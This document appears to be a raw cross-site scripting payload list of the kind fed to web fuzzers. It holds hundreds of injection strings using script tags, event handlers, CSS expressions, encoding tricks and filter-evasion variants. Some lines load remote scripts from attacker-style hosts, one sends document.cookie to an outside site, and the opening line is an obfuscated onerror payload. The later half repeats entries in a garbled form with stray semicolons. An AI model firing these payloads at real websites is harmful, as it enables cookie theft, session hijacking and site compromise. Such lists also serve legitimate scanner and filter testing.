<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> | |
</body> | |
</html> | |
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> | |
<SCRIPT> alert(“XSS”); </SCRIPT> | |
<BODY ONLOAD=alert("XSS")> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IFRAME SRC=”http://hacker-site.com/xss.html”> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> | |
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
<SCRIPT>alert('XSS')</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS');"> | |
<BODY ONLOAD=alert('XSS')> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG DYNSRC="javascript:alert('XSS');"> | |
<IMG LOWSRC="javascript:alert('XSS');"> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |
exp/*<XSS STYLE='no\xss:noxss("*//*"); | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> | |
<IMG SRC="livescript:[code]"> | |
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IMG SRC="mocha:[code]"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> | |
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> | |
<HTML xmlns:xss> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> | |
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> | |
<HTML><BODY> | |
<!--[if gte IE 4]> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)'; | |
<BR SIZE="&{alert('XSS')}"> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert(&quot;XSS&quot;)> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> | |
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
\";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav&#x09;ascript:alert('XSS');"> | |
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> | |
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> | |
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 | |
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out | |
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out | |
<IMG SRC=" &#14; javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<IFRAME SRC=http://ha.ckers.org/scriptlet.html < | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<SCRIPT>a=/XSS/ | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A> | |
<A HREF="//www.google.com/">XSS</A> | |
<A HREF="//google">XSS</A> | |
<A HREF="http://ha.ckers.org@google">XSS</A> | |
<A HREF="http://google:ha.ckers.org">XSS</A> | |
<A HREF="http://google.com/">XSS</A> | |
<A HREF="http://www.google.com./">XSS</A> | |
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> | |
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> | |
<script>document.vulnerable=true;</script> | |
<img SRC="jav ascript:document.vulnerable=true;"> | |
<img SRC="javascript:document.vulnerable=true;"> | |
<img SRC="  javascript:document.vulnerable=true;"> | |
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> | |
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> | |
<script <B>document.vulnerable=true;</script> | |
<img SRC="javascript:document.vulnerable=true;" | |
<iframe src="javascript:document.vulnerable=true; < | |
<script>a=/XSS/\ndocument.vulnerable=true;</script> | |
\";document.vulnerable=true;;// | |
</title><SCRIPT>document.vulnerable=true;</script> | |
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> | |
<body BACKGROUND="javascript:document.vulnerable=true;"> | |
<body ONLOAD=document.vulnerable=true;> | |
<img DYNSRC="javascript:document.vulnerable=true;"> | |
<img LOWSRC="javascript:document.vulnerable=true;"> | |
<bgsound SRC="javascript:document.vulnerable=true;"> | |
<br SIZE="&{document.vulnerable=true}"> | |
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> | |
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> | |
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS | |
<img SRC='vbscript:document.vulnerable=true;'> | |
1script3document.vulnerable=true;1/script3 | |
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> | |
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> | |
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> | |
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> | |
<table BACKGROUND="javascript:document.vulnerable=true;"> | |
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="width: expression(document.vulnerable=true);"> | |
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> | |
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> | |
<XSS STYLE="xss:expression(document.vulnerable=true)"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> | |
<style TYPE="text/javascript">document.vulnerable=true;</style> | |
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> | |
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> | |
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> | |
<base HREF="javascript:document.vulnerable=true;//"> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> | |
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> | |
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> | |
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> | |
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> | |
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- | |
<a href="javascript#document.vulnerable=true;"> | |
<div onmouseover="document.vulnerable=true;"> | |
<img src="javascript:document.vulnerable=true;"> | |
<img dynsrc="javascript:document.vulnerable=true;"> | |
<input type="image" dynsrc="javascript:document.vulnerable=true;"> | |
<bgsound src="javascript:document.vulnerable=true;"> | |
&<script>document.vulnerable=true;</script> | |
&{document.vulnerable=true;}; | |
<img src=&{document.vulnerable=true;};> | |
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> | |
<iframe src="vbscript:document.vulnerable=true;"> | |
<img src="mocha:document.vulnerable=true;"> | |
<img src="livescript:document.vulnerable=true;"> | |
<a href="about:<script>document.vulnerable=true;</script>"> | |
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> | |
<body onload="document.vulnerable=true;"> | |
<div style="background-image: url(javascript:document.vulnerable=true;);"> | |
<div style="behaviour: url([link to code]);"> | |
<div style="binding: url([link to code]);"> | |
<div style="width: expression(document.vulnerable=true;);"> | |
<style type="text/javascript">document.vulnerable=true;</style> | |
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> | |
<style><!--</style><script>document.vulnerable=true;//--></script> | |
<<script>document.vulnerable=true;</script> | |
<![<!--]]<script>document.vulnerable=true;//--></script> | |
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> | |
<img src="blah"onmouseover="document.vulnerable=true;"> | |
<img src="blah>" onmouseover="document.vulnerable=true;"> | |
<xml src="javascript:document.vulnerable=true;"> | |
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> | |
<div datafld="b" dataformatas="html" datasrc="#X"></div> | |
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> | |
<style>@import'http://www.securitycompass.com/xss.css';</style> | |
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> | |
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> | |
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> | |
<script SRC="http://www.securitycompass.com/xss.jpg"></script> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> | |
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> | |
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> | |
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] | |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
</script><script>alert(1)</script> | |
</br style=a:expression(alert())> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
<br size=\"&{alert('XSS')}\"> | |
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out | |
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS STYLE=xss:expression(alert('XSS'))> | |
"><script>alert('XSS')</script> | |
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS STYLE=xss:e/**/xpression(alert('XSS'))> | |
</XSS STYLE=xss:expression(alert('XSS'))> | |
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; | |
';';;!--";<;XSS>;=&;{()} | |
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; | |
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; | |
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; | |
<;BASE HREF=";javascript:alert(';XSS';);//";>; | |
<;BGSOUND SRC=";javascript:alert(';XSS';);";>; | |
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; | |
<;BODY ONLOAD=alert(';XSS';)>; | |
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; | |
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; | |
<;DIV STYLE=";width: expression(alert(';XSS';));";>; | |
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; | |
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; | |
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; | |
<;IMG SRC=";javascript:alert(';XSS';);";>; | |
<;IMG SRC=javascript:alert(';XSS';)>; | |
<;IMG DYNSRC=";javascript:alert(';XSS';);";>; | |
<;IMG LOWSRC=";javascript:alert(';XSS';);";>; | |
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser | |
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); | |
<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS | |
<;IMG SRC=';vbscript:msgbox(";XSS";)';>; | |
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; | |
<;IMG SRC=";livescript:[code]";>; | |
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE | |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; | |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; | |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; | |
<;IMG SRC=";mocha:[code]";>; | |
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; | |
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; | |
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; | |
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d); | |
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; | |
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; | |
<;XSS STYLE=";xss:expression(alert(';XSS';))";>; | |
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; | |
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; | |
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; | |
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; | |
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; | |
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; | |
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; | |
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; | |
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; | |
<;HTML xmlns:xss>; | |
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; | |
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; | |
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; | |
<;HTML>;<;BODY>; | |
<;!--[if gte IE 4]>; | |
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; | |
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; | |
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; | |
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; | |
<;? echo(';<;SCR)';; | |
<;BR SIZE=";&;{alert(';XSS';)}";>; | |
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; | |
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; | |
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; | |
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; | |
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; | |
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; | |
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; | |
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; | |
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- | |
\";;alert(';XSS';);// | |
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; | |
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; | |
<;IMG SRC=";jav	ascript:alert(';XSS';);";>; | |
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; | |
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; | |
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; | |
<;IMG
SRC
=
";
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

';
X
S
S
';
)
";
>;
 | |
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out | |
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out | |
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; | |
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; | |
<;SCRIPT SRC=http://ha.ckers.org/xss.js | |
<;SCRIPT SRC=//ha.ckers.org/.j>; | |
<;IMG SRC=";javascript:alert(';XSS';)"; | |
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; | |
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; | |
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; | |
<;SCRIPT>;a=/XSS/ | |
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
